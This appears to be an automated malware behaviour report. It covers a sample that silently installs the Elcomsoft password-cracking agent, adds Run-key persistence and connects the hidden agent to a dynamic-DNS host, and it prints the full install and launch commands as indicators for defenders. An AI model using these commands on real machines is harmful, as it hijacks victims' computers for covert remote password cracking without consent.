Technical Information

Summary of the observed behaviour (grounded in the entries below): the sample writes a Windows Installer package and a batch file to %TEMP% and installs the package silently through an elevation helper ('%TEMP%\Elevate.exe' msiexec /i %TEMP%\software.msi /quiet), registers the Elcomsoft Distributed Password Recovery agent (epr_agent.exe -s) under HKLM\...\CurrentVersion\Run for persistence, and then starts the agent with -hide_indicator=1 pointed at a dynamic-DNS host (spd.zapto.org, TCP port 12121) instead of a local DPR server. Elcomsoft Distributed Password Recovery is a commercial password-cracking product, so the binaries themselves are not the indicator; detection and triage should key on the deployment pattern — silent MSI install from %TEMP%, hidden tray indicator, Run-key persistence and a dynamic-DNS server_host — which is consistent with unauthorised use of the victim's CPU for remote password cracking. The CryptnetUrlCache entries and the CRL / authroot downloads (comodoca.com, usertrust.com, download.windowsupdate.com) are most likely ordinary certificate-chain and revocation checks performed during installation and should not be treated as C2; the wpad lookup is standard Windows proxy auto-discovery.
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Elcomsoft Distributed Agent' = '"%PROGRAM_FILES%\Elcomsoft\Distributed Password Recovery\epr_agent.exe" -s'
- '%WINDIR%\Installer\MSI14.tmp' ShellUpd.exe
- '%PROGRAM_FILES%\Elcomsoft\Distributed Password Recovery\epr_agent.exe' -s
- '%PROGRAM_FILES%\Elcomsoft\Common Files\epr_worker.exe' -name=espr_server_1
- '%PROGRAM_FILES%\Elcomsoft\Common Files\epr_worker.exe' -name=espr_server_0
- '%WINDIR%\Installer\MSI7.tmp' epr_agent.exe -stop
- '%TEMP%\Elevate.exe' msiexec /i %TEMP%\software.msi /quiet
- '%PROGRAM_FILES%\Elcomsoft\Distributed Password Recovery\epr_agent.exe' -app -server_host=spd.zapto.org -server_port=12121 -hide_indicator=1 -log="%ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\epr_agent.log" -Language=epr_english.lng
- '%WINDIR%\Installer\MSI8.tmp' edpr_reg_to_cfg.exe -agent
- '<SYSTEM32>\msiexec.exe' /V
- '<SYSTEM32>\msiexec.exe' /i %TEMP%\software.msi /quiet
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\t.bat" "
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_oracle.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_pdf.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_opendoc.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_nt.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_office.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_pfx.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_thebat.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_wpapsk.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_syskey.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_pgp.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_sqlce.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_crypt.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_dcc.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\epr_worker.exe
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Languages\epr_russian.lng
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Languages\epr_spanish.lng
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_eppb.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_mssql.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_notes.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_mozilla.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_md5.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_mig.dll
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\German.udic
- %PROGRAM_FILES%\Elcomsoft\Common Files\taccapi.version_key
- %WINDIR%\Installer\{A676A6ED-D043-4F42-98EC-B346CE6AACF3}\epr_agent.exe
- %PROGRAM_FILES%\Elcomsoft\Common Files\taccapi.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\tacc\algorithms\taccAlg_PBKDF2-SHA1_10_1_0100.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\tacc\algorithms\taccAlg_PBKDF2-SHA1_10_1_0100.version_key
- %WINDIR%\Installer\{A676A6ED-D043-4F42-98EC-B346CE6AACF3}\uninstall_icon
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\epr_agent.log
- %PROGRAM_FILES%\Elcomsoft\Common Files\tacc\taccapi.xml
- %WINDIR%\Installer\MSI14.tmp
- %WINDIR%\Installer\{A676A6ED-D043-4F42-98EC-B346CE6AACF3}\product_icon
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\epr_agent.cfg
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\Russian.udic
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\russian_first_names.udic
- %PROGRAM_FILES%\Elcomsoft\Common Files\openmail.exe
- %PROGRAM_FILES%\Elcomsoft\License.rtf
- %PROGRAM_FILES%\Elcomsoft\Common Files\openipc.dll
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\russian_pet_names.udic
- %PROGRAM_FILES%\Elcomsoft\Common Files\tacc\algorithms\taccAlg_Office2007_9_1_0120.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\tacc\algorithms\taccAlg_Office2007_9_1_0120.version_key
- %PROGRAM_FILES%\Elcomsoft\Common Files\smartdic.dll
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\russian_surnames.udic
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\russian_vegetation.udic
- %TEMP%\Cab5.tmp
- %WINDIR%\Installer\MSI7.tmp
- %TEMP%\Cab3.tmp
- %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\1F356F4D07FE8C483E769E4586569404
- %APPDATA%\Microsoft\CryptnetUrlCache\Content\1F356F4D07FE8C483E769E4586569404
- %WINDIR%\Installer\MSI8.tmp
- %TEMP%\CabD.tmp
- %TEMP%\CabF.tmp
- %TEMP%\CabB.tmp
- %WINDIR%\Installer\MSI9.tmp
- C:\Config.Msi\2a8cc.rbs
- %WINDIR%\Installer\2a8c9.msi
- %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004
- %TEMP%\Elevate.exe
- %TEMP%\software.msi
- %TEMP%\t.bat
- %APPDATA%\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004
- %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\B69D763EB21649DA26F20618312DEE70
- %APPDATA%\Microsoft\CryptnetUrlCache\Content\B69D763EB21649DA26F20618312DEE70
- %TEMP%\Cab1.tmp
- %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
- %APPDATA%\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
- %TEMP%\Cab11.tmp
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\english_vegetation.udic
- %PROGRAM_FILES%\Elcomsoft\Distributed Password Recovery\epr_agent.exe
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\english_surnames.udic
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\english_first_names.udic
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\english_pet_names.udic
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Languages\epr_chinese.lng
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Languages\epr_italian.lng
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Languages\epr_japanese.lng
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Languages\epr_german.lng
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Languages\epr_english.lng
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Languages\epr_french.lng
- %PROGRAM_FILES%\Elcomsoft\Common Files\elcom_devmgr.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\elcom_key.dll
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Help\agent_russian.chm
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Help\agent_english.chm
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Help\agent_german.chm
- %PROGRAM_FILES%\Elcomsoft\Common Files\elcom_lang.xml
- %PROGRAM_FILES%\Elcomsoft\Common Files\elcom_xml.dll
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\English.udic
- %PROGRAM_FILES%\Elcomsoft\Common Files\elcom_reg.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\elcom_net.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\elcom_partners.exml
- %WINDIR%\Installer\MSI9.tmp
- %TEMP%\Cab11.tmp
- %TEMP%\CabF.tmp
- %WINDIR%\Installer\2a8c9.msi
- %WINDIR%\Installer\MSI14.tmp
- C:\Config.Msi\2a8cc.rbs
- %TEMP%\CabD.tmp
- %TEMP%\Cab5.tmp
- %TEMP%\Cab3.tmp
- %TEMP%\Cab1.tmp
- %TEMP%\CabB.tmp
- %WINDIR%\Installer\MSI8.tmp
- %WINDIR%\Installer\MSI7.tmp
- 'cr#.##modoca.com':80
- 'sp#.#apto.org':12121
- 'cr#.##ertrust.com':80
- 'wp#d':80
- 'www.download.windowsupdate.com':80
- cr#.##ertrust.com/UTN-USERFirst-Object.crl
- cr#.##modoca.com/COMODOCodeSigningCA2.crl
- www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
- wp#d/wpad.dat
- www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt
- DNS ASK cr#.##modoca.com
- DNS ASK sp#.#apto.org
- DNS ASK cr#.##ertrust.com
- DNS ASK wp#d
- DNS ASK www.download.windowsupdate.com
- ClassName: 'ElcomSoftDistributedAgentWndClassName' WindowName: 'ElcomSoftDistributedAgentWndName'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'